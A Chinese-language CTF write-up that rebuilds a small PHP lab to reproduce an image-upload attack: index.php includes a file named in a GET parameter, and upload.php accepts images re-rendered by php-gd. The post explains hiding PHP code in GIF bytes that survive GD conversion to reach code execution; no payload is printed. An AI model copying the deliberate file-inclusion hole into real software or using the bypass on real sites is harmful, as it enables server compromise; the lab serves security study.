看往年wp的时候看到了这么一个漏洞,感觉挺有意思就复现一下。
参考文档:
http://www.freebuf.com/articles/web/54086.html
https://www.hackersb.cn/hacker/123.html
想去找找当时比赛的源码,但是好像并没有,无奈,只能自己写一份完成基本功能的代码了。
index.php
1 2 3 4 5 6 7 8
| <?php //error_reporting(0); if(isset($_GET['zz'])) { @include($_GET['zz']); } else include('submit.php'); ?>
|
submit.php
1 2 3 4 5 6 7 8 9
| <META http-equiv="content-type" content="text/html; charset=utf8"> <form action="upload.php" method="post" enctype="multipart/form-data"> <label for="file">filename:</label> <input type="file" name="file" id="file"> </br> <input type="submit" name="submit" value="submit"> </form> 请上传jpg,gif,png文件,谢谢~
|
upload.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37
| <?php function get_random_string(){ $random_string = ''; $str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890"; for($i = 0; $i < 16; $i++){ $random_string .= substr($str, rand(1, 61), 1); } return $random_string; } if(isset($_POST['submit'])){ $uploaded_name=$_FILES['file']['name']; $uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1); if($uploaded_ext=='jpg'||$uploaded_ext=='gif'||$uploaded_ext=='png'){ $target_path='./Err0r/'.get_random_string().'.'.$uploaded_ext; if(!move_uploaded_file($_FILES['file']['tmp_name'],$target_path )){ echo "<script> alert('move faild!');parent.location.href='index.php'; </script>"; } else{ if($uploaded_ext=='jpg') $im =imagecreatefromjpeg($target_path); else if($uploaded_ext=='gif') $im =imagecreatefromgif($target_path); else $im=imagecreatefrompng($target_path); if(!$im){ echo "<script> alert('jpg,png,gif Plz!');parent.location.href='index.php'; </script>"; return ; } echo "<script> alert('$target_path is moved successfully!');parent.location.href='index.php'; </script>"; return ; } } echo "<script> alert('jpg,png,gif Plz!');parent.location.href='index.php'; </script>"; } ?>
|
对比两张经过php-gd库转换过的gif图片,如果其中存在相同之处,这就证明这部分图片数据不会经过转换。然后我可以注入代码到这部分图片文件中,最终实现远程代码执行。
然后根据poc改一下,得到以下gif
